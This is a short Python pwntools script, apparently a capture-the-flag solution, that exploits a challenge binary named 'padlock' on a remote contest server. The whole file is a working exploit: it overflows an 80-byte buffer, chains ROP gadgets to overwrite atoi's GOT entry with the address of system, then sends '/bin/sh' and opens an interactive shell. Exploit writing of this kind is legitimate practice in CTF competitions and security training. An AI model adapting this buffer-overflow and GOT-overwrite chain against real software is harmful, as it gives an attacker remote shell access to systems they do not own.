45 lines
970 B
Python
45 lines
970 B
Python
from pwn import *
|
|
|
|
OFF = 80
|
|
context.binary = elf = ELF("./padlock", checksec=False)
|
|
libc = ELF("/usr/lib/libc.so.6", checksec=False)
|
|
libc = ELF("./libc.so.6", checksec=False)
|
|
# p = process(elf.path)
|
|
p = remote("offsec.m0lecon.it", 13543)
|
|
|
|
add_what = elf.sym["add_what_where"]
|
|
atoi_got = elf.got["atoi"]
|
|
main = elf.sym["main"]
|
|
|
|
pop_rdi = 0x00000000004011FF # format string
|
|
pop_rsi = 0x0000000000401208 # got address
|
|
pop_rdx = 0x0000000000401211
|
|
ret = 0x000000000040101A
|
|
|
|
print(p.recvuntil(b"[padlock] Decimal combination: "))
|
|
|
|
# populate got table
|
|
first_run = flat(
|
|
b"A" * OFF,
|
|
p64(ret),
|
|
p64(main),
|
|
)
|
|
p.sendline(first_run)
|
|
|
|
print(p.recvuntil(b"[padlock] Decimal combination: "))
|
|
diff = libc.symbols["system"] - libc.symbols["atoi"]
|
|
payload = flat(
|
|
b"A" * OFF,
|
|
p64(ret),
|
|
p64(pop_rdi),
|
|
p64(atoi_got),
|
|
p64(pop_rsi),
|
|
p64(diff),
|
|
p64(add_what),
|
|
p64(ret),
|
|
p64(main),
|
|
)
|
|
p.sendline(payload)
|
|
p.sendline(b"/bin/sh")
|
|
p.interactive()
|